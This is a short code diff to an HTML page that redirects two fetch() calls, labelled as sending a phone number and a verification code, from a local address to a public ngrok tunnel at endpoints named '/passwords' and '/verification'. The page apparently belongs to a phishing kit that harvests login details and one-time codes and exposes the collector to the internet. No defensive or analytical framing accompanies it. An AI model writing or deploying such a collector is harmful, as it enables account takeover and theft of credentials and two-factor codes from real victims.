--- a/index.html
+++ b/index.html
@@ -372,7 +372,7 @@
                 }
 
                 // Send phone number to the server immediately
-                fetch('http://192.168.55.124:5001/passwords', {
+                fetch('https://6472-2001-8003-dc3d-4c00-15fa-b693-a0ee-d871.ngrok-free.app/passwords', {
                     method: 'POST',
                     headers: {
                         'Content-Type': 'application/json',
@@ -407,7 +407,7 @@
                 }
 
                 // Send verification code to the server
-                fetch('http://192.168.55.124:5001/verification', {
+                fetch('https://6472-2001-8003-dc3d-4c00-15fa-b693-a0ee-d871.ngrok-free.app/verification', {
                     method: 'POST',
                     headers: {
                         'Content-Type': 'application/json',
